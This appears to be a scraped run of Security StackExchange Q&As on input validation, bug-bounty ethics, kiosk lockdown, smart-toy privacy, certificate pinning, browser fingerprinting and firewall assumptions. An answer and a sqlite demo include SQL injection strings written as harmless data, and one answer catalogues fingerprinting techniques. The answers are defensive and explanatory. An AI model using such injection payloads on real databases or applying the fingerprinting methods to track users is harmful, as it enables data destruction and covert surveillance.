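If you would rather do the extraction programmatically than with the openssl CLI, the Python cryptography package can derive the same public key from the private key. A short sketch (the file name is an example):

```python
from cryptography.hazmat.primitives import serialization

with open("private_key.pem", "rb") as f:  # example file name
    private_key = serialization.load_pem_private_key(f.read(), password=None)

# The private key object contains the modulus and public exponent,
# so the public key can be serialized straight from it.
public_pem = private_key.public_key().public_bytes(
    encoding=serialization.Encoding.PEM,
    format=serialization.PublicFormat.SubjectPublicKeyInfo,
)
print(public_pem.decode())
```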
{ "source": [ "https://security.stackexchange.com/questions/172274", "https://security.stackexchange.com", "https://security.stackexchange.com/users/162408/" ] }
172,297
If I use fully parameterized queries everywhere, is it still necessary and/or security-relevant to somehow sanitize input? E.g. check that mail addresses are valid before sending a parameterized query against the database, or filtering out certain special characters from text? I think of benign, but not-so-well-engineered 3rd party tools (maybe self-written scripts by the admin, or some fancy CrystalReports made by a non-technician) trying to consume unsanitized data from our database. Right now, we have full unicode support against SQL Server (MySQL seems to have problems with Emojis), I'm not sure how to filter out security risks without losing that property.
No, it's not necessary. But please, read on. Input sanitization is a horrible term that pretends you can wave a magic wand at data and make it "safe data". The problem is that the definition of "safe" changes when the data is interpreted by different pieces of software. Data that may be safe to be embedded in an SQL query may not be safe for embedding in HTML. Or JSON. Or shell commands. Or CSV. And stripping (or outright rejecting) values so that they are safe for embedding in all those contexts (and many others) is too restrictive. So what should we do? Make sure the data is never in a position to do harm. The best way to achieve this is to avoid interpretation of the data in the first place. Parametrized SQL queries are an excellent example of this; the parameters are never interpreted as SQL, they're simply put in the database as, well, data. For many other situations, the data still needs to be embedded in other formats, say, HTML. In that case, the data should be escaped for that particular language at the moment it's embedded. So, to prevent XSS, data is HTML-escaped at view time. Not at input time. The same applies to other embedding situations. So, should we just pass anything we get straight to the database? Maybe. It depends. There are definitely things you can check about user input, but this is highly context-dependent. Because sanitization is ill-defined and mis-used, I prefer to call this validation . For example, if some field is supposed to be an integer, you can certainly validate this field to ensure it contains an integer (or maybe NULL). You can certainly do some validation on email fields (although some people argue there's not much you can do besides checking for the presence of a @ , and they have a good point). You can require comments to have a minimum and maximum length. You should probably verify that any string contains only valid characters for its encoding (e.g., no invalid UTF-8 sequences). You could restrict a username to certain characters, if that makes sense for your userbase. A minimum length for passwords is, of course, incredibly common. As you can see, these checks are very context-dependent. And all of them are to help increase the odds you end up with data that makes sense. They are not to protect your application from malicious input (SQL injection, XSS, command injection, etc), because this is not the place to do that. Users should be free to type '; DROP TABLE users; -- without their post being rejected or mangled to \'; DROP TABLE users; -- . Note that I'm able to include such "malicious" content on sec.SE! So, to answer your original question: ... is it still necessary and/or security-relevant to somehow sanitize input? No, it is not. But please do properly escape the data where needed before outputting it. And consider validations, where applicable. I think of benign, but not-so-well-engineered 3rd party tools (maybe self-written scripts by the admin, or some fancy CrystalReports made by a non-technician) trying to consume unsanitized data from our database. Then escape or filter the data before outputting to those tools, but don't mangle data in your database. But really, those scripts should be fixed, or rewritten with security in mind. (MySQL seems to have problems with Emojis) A little off-topic, but have a look at the utf8mb4 charset for MySQL ;)
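To make the "parameters at the database, escaping at the output" distinction concrete, here is a small Python sketch using only the standard library (sqlite3 and html). The table and values are invented; the point is that the data is stored exactly as typed and only escaped for the specific output context, at output time:

```python
import html
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE comments (author TEXT, body TEXT)")

# The placeholder keeps this string as data; it is never interpreted as SQL.
user_input = "'; DROP TABLE comments; --"
conn.execute("INSERT INTO comments (author, body) VALUES (?, ?)",
             ("mallory", user_input))

# Escape only when embedding into HTML, at view time.
for author, body in conn.execute("SELECT author, body FROM comments"):
    print(f"<p><b>{html.escape(author)}</b>: {html.escape(body)}</p>")
```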
{ "source": [ "https://security.stackexchange.com/questions/172297", "https://security.stackexchange.com", "https://security.stackexchange.com/users/37853/" ] }
172,466
We have been contacted by an "independent security researcher" through the Open Bug Bounty project. First communications were quite OK, and he disclosed the vulnerability found. We patched the hole and said "thank you", but declined to pay a donation (see below). The researcher then sent a follow-up email saying that he has found more vulnerabilities, but because we didn't make a donation, he will keep those vulnerabilities for himself. In other words, he only told us he had more vulnerabilities, but would not disclose them, after we made the decision to not pay the suggested voluntary donation. To my understanding, this is no longer in line with responsible white hat behavior. Am I right in this assertion? Update Yes, the person has been quite explicit in the suggested amount for the donation. The various reasons for not paying the requested 'donation' include: the suggested amount of the 'voluntary donation' in combination with the severity of the vulnerability found, the vulnerability in question was, according to our logs, not found by a 'highly skilled' individual, but rather by an automated tool, the fact that the Open Bug Bounty project explicitly mentions that no payment is required, the passive-aggressive tone of voice. The above, in combination with the fact that, while we are in the process of setting up a bug-bounty budget and associated policy, we haven't completed this yet. Let's be clear: we did not set a bounty, nor promise one, and we did not sign up for this project. The Open Bug Bounty project is an unaffiliated project that explicitly says: "There is, however, absolutely no obligation or duty to express a gratitude". Also, note: While I'm in support of some sort of legal framework to protect bona fide security researchers, this legal framework does not, at this moment, exist in our jurisdiction; a fact our legal counsel was all too keen to point out.
I'm a bug hunter and I have no idea why everybody here thinks it's perfectly fine of him to attack your website without permission, determine a bounty amount himself, and threaten to hold back potentially dangerous flaws because he doesn't get the money he wants. Why didn't he ask about your policy beforehand? You never claimed to run a bug bounty program, or to be able to pay anyone for anything in the first place. To clarify again, OP did not sign up for the Open Bug Bounty project. The project offers to be an intermediary between researchers and websites that don't run a bounty program. Also, they explicitly mention that you are not obliged to pay anything, and the researcher should be well aware of that if he read the guidelines. A website owner can express a gratitude to the researcher in a way s/he considers the most appropriate and proportional to the researcher's efforts and help. We encourage website owners to say at least a “thank you” to the researcher or write a recommendation in the researcher’s profile. There is, however, absolutely no obligation or duty to express a gratitude. (Emphasis my own) If he expects a monetary reward, he should be searching for bugs at companies that actually run a bounty program. There are plenty of reputable programs paying high rewards. The researcher then sent a follow up email saying that he has found more vulnerabilities, but because we didn't make a donation, he will keep those vulnerabilities for himself. If he already found them and it's not much effort to put them in a list and let you know, then yes, I find it unethical to hold the bugs back. 1 You didn't ask him to do work for you. He could have inquired if you pay for bugs beforehand. And he didn't so much offer you his expertise for a donation - from your description it sound more like a mild threat that if you don't pay him, your website is in danger. Take that incident as a hint that you need to invest more in your security. Consider setting up a real bug bounty program with small bounties or hiring a professional penetration tester. But don't let him extort money from you if you never promised any. 1 It's not that he should do free work for you. It's the fact that he mentions that there is something he won't tell you unless you pay him a particular amount that makes it unethical, especially if an exploitation of these bugs could threaten the future of your company.
{ "source": [ "https://security.stackexchange.com/questions/172466", "https://security.stackexchange.com", "https://security.stackexchange.com/users/2113/" ] }
172,532
We want to protect a game that is basically sold with the computer containing it. The security is done this way: The HDD is encrypted using hardware TPM 1.2, which holds a unique key to decrypt the OS only in that specific computer. So Windows will boot only in one PC. Also, the TPM will not let Windows boot if any hardware change happens. explorer.exe is replaced by game.exe, so the system boots the game at startup. If you exit the game there is no Explorer, just a black screen. Ctrl, Alt and other keys are disabled, so the Task Manager is not accessible. The Ethernet adapter is disabled, and autorun is disabled to prevent dumping game.exe. Deep Freeze is installed, so the user can't enter Safe or Repair modes. Is this a secure system? If it is not secure, what can an attacker do?
We can analyze your setup by comparing it against a system known not to be tamper-proof, the Sony PlayStation 3. OS control: You have no control over the OS. Sony did write the OS themselves. Size of the OS: The PS3 OS can be very simple as it just needs to boot games. Windows is a generic OS, with many, many functions. This exposes many APIs. Shell: The PS3 OS shell is intended to just start games. On Windows, the default UI is provided by Explorer. You propose to replace it, which isn't a design goal for Microsoft. It may appear to work, but tearing out Explorer may leave some open interfaces. That is a special problem for you because such open interfaces may become attack vectors. Hardware: You appear to be working off standard PC hardware, just with a TPM. Sony had designed the PS3 from the start on the assumption that hackers would be attacking the hardware. Your standard PC probably has PCI-e slots. Those support DMA. Using that, you gain access to the PC's memory. This will be unencrypted. A common way to do this is via FireWire. IIRC, modern consoles now keep the RAM encrypted as well, and they obviously don't grant DMA access to outside hardware. Conclusion: Your system appears less safe than a PS3, and a PS3 can be hacked, so it is safe to assume yours can be too.
{ "source": [ "https://security.stackexchange.com/questions/172532", "https://security.stackexchange.com", "https://security.stackexchange.com/users/162724/" ] }
172,553
There have been ads on the radio recently for a wifi enabled toy called Talkies , which are advertised as being able to communicate with app enabled phones, with a "trusted circle" that other phones can be added to. (Obligatory photo of a cute wifi enabled critter) Especially considering the Krack vulnerability , and the known process of " grooming " a child that a sexual or other predator goes through to gain their trust and exploit them ( Here is a story about how Snapchat was used), is this a toy that I should steer away from for my child? (3 years old currently)
Be very, very careful. It's not KRACK that is the problem, it is a lax attitude to security and privacy in general. So called "smart" consumer products can often be hijacked, accessed from the internet, or monitored. As a customer, it is hard to know if any specific product is safe or not. The Norwegian Consumer Council has been on the case for a while, and produced a few horror stories. From a report, aptly titled #ToyFail , on three "smart" dolls: When scrutinizing the terms of use and privacy policies of the connected toys, the NCC found a general disconcerting lack of regard to basic consumer and privacy rights. [...] Furthermore, the terms are generally vague about data retention, and reserve the right to terminate the service at any time without sufficient reason. Additionally, two of the toys transfer personal information to a commercial third party, who reserves the right to use this information for practically any purpose, unrelated to the functionality of toys themselves. [I]t was discovered that two of the toys have practically no embedded security. This means that anyone may gain access to the microphone and speakers within the toys, without requiring physical access to the products. This is a serious security flaw, which should never have been present in the toys in the first place. And from an other of their reports, again aptly named #WatchOut , on "smart" watches for kids: [T]wo of the devices have flaws which could allow a potential attacker to take control of the apps, thus gaining access to children’s real-time and historical location and personal details, as well as even enabling them to contact the children directly, all without the parents’ knowledge. Additionally, several of the devices transmit personal data to servers located in North America and East Asia, in some cases without any encryption in place. One of the watches also functions as a listening device, allowing the parent or a stranger with some technical knowledge to audio monitor the surroundings of the child without any clear indication on the physical watch that this is taking place. And the FBI agrees : Smart toys and entertainment devices for children are increasingly incorporating technologies that learn and tailor their behaviours based on user interactions. These features could put the privacy and safety of children at risk due to the large amount of personal information that may be unwittingly disclosed. So unless you have a real need (other than "this is cool") for these kinds of products, I would say that your best approach is to simply stay away from them.
{ "source": [ "https://security.stackexchange.com/questions/172553", "https://security.stackexchange.com", "https://security.stackexchange.com/users/16555/" ] }
172,895
Why do people trust companies in countries with big surveillance programs like the US? Many US Certificate Authorities secure the web for live SSL/TLS connections. Still, an NSL would be enough for the government to gain the right to intercept the traffic legally. So why does anybody even assume that US CAs are remotely private? Why do big companies and other (illegal) organizations, for which privacy is a big factor, not fully use CAs from countries with strict privacy laws like Switzerland or Sweden?
Why do big companies (...) not fully use CAs from countries with strict privacy laws like Switzerland or Sweden? Because any CA can issue a certificate for any domain anyway (with some caveats). If your ISP wanted to intercept all your future connections to https://example.com/ by exchanging its certificate with a rogue one, they wouldn't have to ask the original issuer of the certificate for help. They just needed to get any issuer in your local root certificate store to issue the certificate, and your browser would accept it as valid (you'd see the green lock icon and not be aware of the attack without examining the certificate). So switching to a more reliable CA wouldn't help the site owner a whole lot against a government actor. (If you personally distrust some CAs, you could also revoke their trust locally in your root cert store.) Instead, what a site owner can do is use certificate / public key pinning . E.g., a website can send a HPKP header to announce hashes of public keys that must be part of the certificate chain when connecting to the site. If a site has implemented HPKP correctly and your browser is aware of the pins (either by having seen the header before or by preloading ), a rogue certificate would be rejected by the browser even if it was issued by a trusted CA because the attacker (or any CA) can't produce one whose fingerprint matches the pin.
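For illustration, the pinning header described above looks roughly like the sketch below; the pin values are placeholders rather than real fingerprints (real ones are base64-encoded SHA-256 hashes of a certificate's Subject Public Key Info, and at least one backup pin is expected so the site doesn't lock out its own users).

```python
# Placeholder pins -- in practice these are SHA-256 hashes of the SPKI of
# certificates in (or intended for) the site's chain, base64-encoded.
PRIMARY_PIN = "cUPcTAZWKaASuYWhhneDttWpY3oBAkE3h2+soZS7sWs="
BACKUP_PIN = "M8HztCzM3elUxkcjR2S5P4hhyBNf6lHkmjAHKhpGPWE="

hpkp_header = (
    "Public-Key-Pins: "
    f'pin-sha256="{PRIMARY_PIN}"; '
    f'pin-sha256="{BACKUP_PIN}"; '
    "max-age=5184000; includeSubDomains"
)
print(hpkp_header)
```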
{ "source": [ "https://security.stackexchange.com/questions/172895", "https://security.stackexchange.com", "https://security.stackexchange.com/users/141553/" ] }
173,011
I work at a small nonprofit and woke up to find that many of our email addresses have been sending spam asking recipients to open an attachment (doc file). We have a local network that all of our computers are connected by. I'm not sure about the security of it. We also have our website and emails managed by a third party. Is this issue more likely to be caused by our local network being compromised or the web server?
Email addresses do not send spam. Email servers do. Anybody can forge your email address as the From address without hacking you at all. That's how you get spam all the time that says it comes from you. You can however tell from the email headers what servers it was sent through. Best thing to do would be to contact the third party that is hosting your email. Ideally, send them a copy of the headers from one of these spam emails. They will be able to tell where the emails are coming from. In fact, if they are coming from your website or a local computer sending email, they'll probably be contacting you eventually, since it will start getting their mail servers blacklisted eventually.
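As a sketch of the header check suggested above, the standard-library email module can list a saved message's Received headers; the filename is just an example, and the raw message would typically be exported from the mail client first.

```python
from email import policy
from email.parser import BytesParser

# Parse a raw message saved from the mail client ("spam.eml" is a placeholder).
with open("spam.eml", "rb") as f:
    msg = BytesParser(policy=policy.default).parse(f)

print("Claimed From:", msg["From"])

# Each relay prepends its own Received header, so the last one listed is
# usually the server closest to the real origin of the message.
for i, hop in enumerate(msg.get_all("Received", []), start=1):
    print(f"Hop {i}: {hop}")
```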
{ "source": [ "https://security.stackexchange.com/questions/173011", "https://security.stackexchange.com", "https://security.stackexchange.com/users/163312/" ] }
173,013
Are there any quantum computing-secure open key exchange algorithms already implemented in SSL/TLS which I could use on my web server? As far as I know, all the available options like RSA, DH, elliptic curves, etc. are insecure against quantum computer brute force. If (I assume) the answer is NO, are there any activities by major industry players to allow QC-secure algorithms in the near future?
{ "source": [ "https://security.stackexchange.com/questions/173013", "https://security.stackexchange.com", "https://security.stackexchange.com/users/163316/" ] }
173,020
I have two network segments (call them A @ 192.168.1.x and B @ 192.168.2.x) plugged into two separate NICs (NIC-A and NIC-B). The OS on the physical machine is standard stock Ubuntu, with nothing configured to do any bridging or routing. So it can "see" both networks, but the two networks don't have a way to talk to each other. Devices on Network-B don't have a default gateway assigned. Network B has no internet access, and I want to make sure that it stays segregated. Is this sufficient to consider this solution fairly secure? Or should we consider implementing something on the OS to actually firewall these two networks?
{ "source": [ "https://security.stackexchange.com/questions/173020", "https://security.stackexchange.com", "https://security.stackexchange.com/users/42265/" ] }
173,233
I am currently trying to mask the OS I am using from the websites I visit. I'm doing this for an added layer of security. How would I go about hiding the OS from websites?
It is not currently possible to hide the type of OS from a website A solution against general fingerprinting and obtaining more specific information about your system is to use Tor Browser with the security slider set to high (in order to disable JavaScript). It is designed with fingerprint resistance in mind, attempting to look identical to all other instances of the browser. It provides resistance in several ways: Unlike a regular connection or a VPN, Tor exposes the network stack of the exit node, not of your own computer, so you do not have to mess with advanced TCP option mangling firewalls or modify low-level networking code in your operating system. With JavaScript disabled, system-specific behavior like high resolution math libraries (certain trigonometry functions give unique results for each operating system) and data formatting functions (which format the data in an OS-specific way). The user agent is standardized. There is no way to know what the underlying system is from just the user agent itself. Changing the user agent randomly makes you stand out as one of the few people doing it, so using a standard one is preferred. The default window size is standardized, so CSS and JS functions which obtain the window size cannot guess your operating system based on things like the size of your task bar. However , the task of preventing the general type of operating system from being known is currently impossible, even on Tor Browser. A list of whitelisted fonts is provided in order to prevent font rendering exploitation or font fingerprinting, but the whitelist is different for Linux, OSX, and Windows due to needing to use system fonts. There is currently no way around this. Until you find a way to provide system fonts without revealing what type of operating system you are using, you'll have no lock. Also note that EFF's Panopticlick is only meant to bring awareness to the issue of fingerprinting. It is extremely limited in what signatures it looks for, and does not analyze a representative sample. You should instead look into https://amiunique.org/ , which was designed from the current most extensive research into browser fingerprinting. How does fingerprinting work in general? While it is not possible to hide the general class of operating system you are running, you can make it so that you blend in with the so-called "anonymity set". A list of ways you can fingerprint a browser, with some notes, in case it is helpful: TCP/IP stack fingerprinting - The TCP protocol provides some extra extensions changing its behavior such as window size (unrelated to browser window size), max segment size (MSS), time-to-live (TTL), and others. It is also padded by a nop option which does nothing but make sure the size of the options are consistent. Different classes of operating systems use different values. Linux for example sets the TTL to 64, whereas Windows uses 255. Additionally, the order of these options and where the nops are inserted differs from OS to OS. Generic settings exposed by the browser - Certain things like the order of headers and the headers themselves can uniquely identify a browser. This includes thing like the system locale, DNT status, cookie status, etc. This is effectively all EFF's Panopticlick looks for, and a small subset at that. WebGL fingerprinting - When certain types of hardware acceleration are enabled, the browser gets low-level access to your GPU. 
By telling the GPU to generate certain 3D shapes with special graphical properties (textures, light, transparency, etc) and applying various transforms to it and then hashing the resulting pixmap, quirks unique to your specific GPU can be identified. This allows a browser to be identified regardless of the operating system it is run as. Audiocontext fingerprinting - Similar to WebGL fingerprinting, the browser can be told to generate triangle wave audio, then compress it, then increase gain and hash the resulting audio buffer. This hash will be unique to your system, regardless of what you have booted into. There is no need for the audio to actually be played for this to work. Timezone fingerprinting - The system's timezone as set in environmental variables is available via JavaScript. Math library fingerprinting* - When certain trigonometry functions are used, such as calculating the sin of the value 10, the system's math library is called, and this differs for each OS. It will likely be the same among classes of operating systems. Canvas fingerprinting** - By generating a visual canvas element and hashing it, results unique to your browser can be obtained. Window size fingerprinting** - The CSS @media elements can be used to selectively load resources based on the (often unique) size of the browser window. A website can create a large number of resources and see which ones your browser loads to tell the window size. Font list fingerprinting - Your font list is often fairly unique, and differs between different OSes. As mentioned earlier, there is no practical way to avoid this. Keeping a list of whitelisted system fonts reduces the fingerprinting accuracy to the general class of OS you are running. Date format fingerprinting* - If you call Date().toLocaleFormat() in the browser, the output string will depend on the operating system you are using. The output on Linux, OSX, and Windows 7 respectively is "Thu 26 Mar 2015 03:43:35 PM EDT", "Thu Mar 26 15:38:55 2015", and "Thursday, March 26, 2015 3:45:01 PM". Virtual core fingerprinting* - The hardwareConcurrency JavaScript feature can be used to automatically spawn a number of threads for performance. By starting with one and increasing it gradually, while giving the browser a CPU-heavy workload, the number of virtual cores can be guessed based on the point at which more threads no longer improve performance. * Tor Browser only mitigates these if JavaScript is disabled. ** Tor browser mitigates these with help from the user, so the user must follow its recommendations.
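As a toy illustration of how these individual signals add up, a tracker only needs to concatenate whatever attributes it can read and hash them; the attribute values below are invented, and real fingerprinting scripts combine many more signals (WebGL, AudioContext, canvas, and so on).

```python
import hashlib

# Invented example attributes a site might collect from a browser.
attributes = {
    "user_agent": "Mozilla/5.0 (X11; Linux x86_64) ...",
    "timezone": "Europe/Warsaw",
    "fonts": "Arial,DejaVu Sans,Liberation Serif",
    "screen": "1920x1080x24",
    "hardware_concurrency": "8",
}

# Concatenate the attributes in a fixed order and hash them; the more
# attributes collected, the more distinctive the resulting identifier.
canonical = "|".join(f"{k}={v}" for k, v in sorted(attributes.items()))
fingerprint = hashlib.sha256(canonical.encode()).hexdigest()
print(fingerprint[:16])
```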
{ "source": [ "https://security.stackexchange.com/questions/173233", "https://security.stackexchange.com", "https://security.stackexchange.com/users/163524/" ] }
173,284
The common anti-virus (to my knowledge) uses a kind of brute-force method where it gets the hash of the file and compares it to thousands of known virus hashes. Is it just that they have servers with super-fast SSDs that they upload the hashes to and search really fast, or am I completely wrong in my understanding of how they work?
Disclosure: I work for an anti-virus vendor. Because most anti-virus engines were born as protecting endpoints, and even now for many of them endpoint protection is major part of business, the modern anti-virus engines are optimized for scanning endpoints. This optimization includes many things, such as: Not scanning the files which couldn't contain infections which can infect your computer; Remembering which files were scanned, and not scanning them again unless the files were modified; Optimizing scans for the file types when possible - for example when scanning executables, only certain parts of it need to be scanned. This minimizes disk reads, and improves performance. A common misconception is that AV engines use hashes. They generally do not, for three reasons: First is that getting around hash detection is very easy and doesn't require modifying the actual malicious code at all; Second is that using hashes does not allow you to implement any kind of proactive protection - you will only be able to detect malware which you have seen; Calculating a hash requires the whole file to be read, while for some files (such as executables) this is not necessary. And reading the whole file on non-SSD hard drives is expensive operation - most AV engines should scan a large clean executable file faster than calculating hash on it
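To see why plain file hashes are so easy to get around (the first point above), note that changing a single byte — something a malware author can do without touching the malicious logic — yields a completely different digest. A quick Python sketch with made-up bytes:

```python
import hashlib

original = b"MZ\x90\x00" + b"...pretend this is an executable..."
modified = bytearray(original)
modified[-1] ^= 0x01  # flip one bit in a byte the program never uses

print(hashlib.sha256(original).hexdigest())
print(hashlib.sha256(bytes(modified)).hexdigest())
# The two digests share nothing, so a hash blacklist misses the new variant.
```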
{ "source": [ "https://security.stackexchange.com/questions/173284", "https://security.stackexchange.com", "https://security.stackexchange.com/users/163574/" ] }
173,391
I started working on an app that connects to a RESTful service for authentication and data. User POSTs the user name and password to /token endpoint. Once they log in successfully, they get a bearer token that they then append to the Authorization header in the subsequent calls to different protected resources. My question is what prevents users from intercepting their regular post from the app (getting the token) and then possibly sending bunch of POST requests (using something like postman or fiddler) to create a large number of fake posts or articles or whatever else the app does. What are some possible ways from protecting from this? Does the fact that the traffic to the service will eventually go via TLS make this a non-issue?
My question is what prevents users from intercepting their regular post form the app (getting the token) and then possibly sending bunch of POST requests (using something like postman or fiddler) to create a large number of fake posts or articles or whatever else the app does. Nothing Does the fact that the traffic to the service will eventually go via TLS make this a non-issue? This makes no difference at all. What are some possible ways from protecting from this? The most common one is rate limiting. I.e. if someone posts at a much higher level than anticipated reject the post. There are several approaches to this - when did they last post, rolling average over N minutes etc. If you don't want false positives resulting in users losing post content then make them re-authenticate to continue. Another approach is captchas. I.e trying to make the user prove they are human. Another is attempting to detect automatically generated content using spam filters or AI.
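A minimal sketch of the rolling-window style of rate limiting mentioned above; the window, threshold, and in-memory storage are arbitrary illustrative choices, and a real deployment would persist this state and combine it with the other measures listed.

```python
import time
from collections import defaultdict, deque

WINDOW_SECONDS = 60
MAX_POSTS_PER_WINDOW = 5

_recent_posts = defaultdict(deque)  # user_id -> timestamps of recent posts

def allow_post(user_id: str) -> bool:
    now = time.monotonic()
    timestamps = _recent_posts[user_id]
    # Drop timestamps that have fallen out of the rolling window.
    while timestamps and now - timestamps[0] > WINDOW_SECONDS:
        timestamps.popleft()
    if len(timestamps) >= MAX_POSTS_PER_WINDOW:
        return False  # reject, or escalate to a CAPTCHA / re-authentication
    timestamps.append(now)
    return True
```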
{ "source": [ "https://security.stackexchange.com/questions/173391", "https://security.stackexchange.com", "https://security.stackexchange.com/users/163670/" ] }
173,484
I came across this question and I have never seen a site that does that, which is a red flag. However, the approach seems sound and it gets around having to implement password rules to enforce strong passwords. Also, if all sites did that it would ensure users don't reuse passwords. So what are the drawbacks of that approach? Is there a good reason all sites don't use that approach? Specifically, I'm assuming we follow best practices that came up in the comments and answers of that question, such as: generate a long (32+ char), random (with good randomness) password show it to the user once hash it with SHA256 resetting the password generates another long, random password In fact perhaps the approach could even be enhanced if instead of showing the password to the user, the site simply displayed a form with the password field filled in so the browser and/or passwords managers could memorize it. The user would just submit the form and would never have to see it.
Security at the expense of usability comes at the expense of security The problem is that there is only so much a web application can do to force good security practices on users. In this particular case I can tell you what will happen in the vast majority of cases: people will write down their "secure" password somewhere nice and insecure. As a result, this will not necessarily make anything more secure: it will just shuffle around where the vulnerability lives. In essence, this system is missing some necessary supporting architecture to make the user experience very easy, and therefore very secure. As a result there are basically three kinds of people with three different results: People who don't care/understand about password security. They are going to write down that uncrackable password in a place that is super-accessible, and as a result super-insecure. These are the same people that reuse the same weak passwords on every site. As a result, they go from one bad security solution to another bad security solution. These are also the majority of web users, so for the majority of the internet your solution has no real benefit. People who use password managers and other password helpers, their password systems cannot integrate with your website. These people will be worse off, as suddenly their normally-secure system can no longer be used. As a result they'll probably end up writing it down, maybe not securely, and be worse off then they were before. To be clear, this will definitely happen: your "show the password in a form so that the password manager can record it" solution will absolutely not work with some password managers. I can just about guarantee it. People who use password managers, and those password managers integrate properly with your system. They were already storing things securely and still are, but now with another point of failure: your random number generator. Overall, though, there security will neither have decreased nor increased substantially. Overall therefore, I would say that I see no real benefit for this system. I have to say this out loud because it is critical in all other contexts: you never want to use SHA256 to hash passwords. In this case you can probably get away with a fast hash because your password is too long for a brute-force to be feasible anyway. Edit to add the obvious answer I think the biggest problem with this solution is that it doesn't go far enough to fix the underlying problem. The underlying problem is that people suck at passwords: we either pick poor ones, reuse them, or don't store them securely. The solution isn't to come up with a new password system: the solution is to ditch passwords all together. Many companies are starting to introduce password-less login. That's the answer you really want.
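For completeness, the "long, random (with good randomness) password" from the proposed scheme is trivial to produce — for example with Python's secrets module, length chosen arbitrarily here — which underlines that generation was never the hard part; how users store and retrieve the value is.

```python
import secrets

# ~43 URL-safe characters drawn from the OS CSPRNG -- far beyond brute force.
password = secrets.token_urlsafe(32)
print(password)
```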
{ "source": [ "https://security.stackexchange.com/questions/173484", "https://security.stackexchange.com", "https://security.stackexchange.com/users/88744/" ] }
173,493
This commit in my GitHub repo is signed by a key I don't recognize: https://github.com/jonathancross/jc-docs/pull/2/commits/124672699991af75dd2454831670758f08bc74ab What is going on here?
GitHub itself is signing commits made through the online editor using the key 0x4AEE18F83AFDEB23 : From: https://help.github.com/articles/about-gpg/ GitHub will automatically sign commits you make using the GitHub web interface. These commits will have a verified status on GitHub. You can verify the signature locally using the public key available at https://github.com/web-flow.gpg
{ "source": [ "https://security.stackexchange.com/questions/173493", "https://security.stackexchange.com", "https://security.stackexchange.com/users/16036/" ] }
173,603
For instance, would it be possible for an app to determine what pixel range on a smartphone display a user is looking at by analysing their eyes with the front facing camera? If so, with what kind of precision? It would be very discomforting to know that apps could collect data in the background on how your eyes respond to displaying certain advertisements.
Eye Tracking for Everyone. 2176-2184. 10.1109/CVPR.2016.239. (2016) - Krafka, Khosla, Kellnhofer et al Our model achieves a prediction error of 1.71cm and 2.53cm without calibration on mobile phones and tablets respectively. With calibration, this is reduced to 1.34cm and 2.12cm. So yes - it is possible. This particular study was performed using iOS and achieved a read rate at 10–15fps. There are several companies selling products with similar technology - UMoove for example. It would not surprise me if a higher precision than in the mentioned paper could be achieved. If you are paticularly concerned a number of smartphone camera covers are available - here is one example .
{ "source": [ "https://security.stackexchange.com/questions/173603", "https://security.stackexchange.com", "https://security.stackexchange.com/users/59369/" ] }
173,609
To give a quick background, we need to implement a solution where we can guarantee that information is stored encrypted. Access to the encrypted data will only be possible through an application that has dedicated access to the database. With every "request" to this application, authentication details will be provided that are then used to create a log of who has read what information and when. My main requirements are: MySQL 5.5. The database will be replicated for backup purposes. One should be able to restore from such a replicated database, but by accessing a replicated database I should not be able to read any information. My idea is to use application-level encryption and store explicitly encrypted values in the database. That is, on a technical level, the database has no way of knowing that information is encrypted. The actual "structure" of the database (tables, columns, etc.) isn't something we consider secret. To implement the application-level encryption I'm thinking of applying AES_ENCRYPT/AES_DECRYPT, which are built into MySQL, using a passphrase that is only known by the application. Does anyone see a problem with this approach? Surely, the passphrase must be kept secret. If the passphrase were to leak, I think it would be trivial to re-encrypt all values with a new passphrase. The database isn't expected to be large, and performance requirements are low. Development and testing environments would be easy to have, as the only difference would be the passphrase used.
{ "source": [ "https://security.stackexchange.com/questions/173609", "https://security.stackexchange.com", "https://security.stackexchange.com/users/163905/" ] }
173,685
Take a look at below picture. This page is not loaded over https, so how do modern browsers make sure this page is secure?
What is there to secure it from? It's loaded directly within the browser. There is no connection outside of the local user context of the machine meaning there is nothing to intercept / tamper with. To modify what you see you'd have to either modify the browser executable, memory space or modify the underlying data used to store the settings. To read the values you would have to be able to read either the browser memory space or underlying files. All of these are end-game. If a malicious actor can do that they have full control and there is no way to protect from it.
{ "source": [ "https://security.stackexchange.com/questions/173685", "https://security.stackexchange.com", "https://security.stackexchange.com/users/34823/" ] }
173,737
So I'm wondering how many passwords are enough to keep my data safe, because right now I have 1 hard password for bank & mail (>10 characters + numbers etc.), 1 medium password for games, and 1 for shady sites. I keep them all memorized and not on paper/in a document. Is this enough?
No, it is not enough. Using the same password for both your email and your bank is a bad idea. If your email provider is compromised, that means the attacker will get access to your bank account, and vice versa. You don't want that. Use one hard password per site. You won't be able to memorise all those, but don't worry. That's what password managers are for. If you want this explained in a video featuring an animated octopus, the Electronic Frontier Foundation has you covered.
{ "source": [ "https://security.stackexchange.com/questions/173737", "https://security.stackexchange.com", "https://security.stackexchange.com/users/164024/" ] }
173,901
I have recently joined a security focused community in my organisation. Many of our products are deployed in the intranet (on-premise) nothing in the public cloud. So, the internal portals can be accessed within the organisation's network only. Recently, a third party Apache library's security vulnerability (apparently, a remote code execution one) was published. Our security lead had asked us to upgrade the library to the latest fixed version immediately. I had asked, " Since the portal is accessed only in the intranet behind a firewall, do we still need to upgrade the library? ". The lead could not provide a detailed explanation due to lack of time and confirmed that the upgrade needs to happen regardless. So, what's wrong with the statement (assumption?), "since we are behind a firewall and such vulnerabilities do not affect us".
Your statement makes two faulty assumptions: Your firewall(s) is/are fully correctly configured and has no vulnerabilities that would allow an attacker to compromise it and that perfect state will continue. Everyone in your organisation is trustworthy and presents no risk. You should always operate on a defence in depth approach and secure every layer wherever you can. If an attacker does penetrate a perimeter, or you do have a rogue actor, then this Apache vulnerability could be exploited if unpatched.
{ "source": [ "https://security.stackexchange.com/questions/173901", "https://security.stackexchange.com", "https://security.stackexchange.com/users/164180/" ] }
174,005
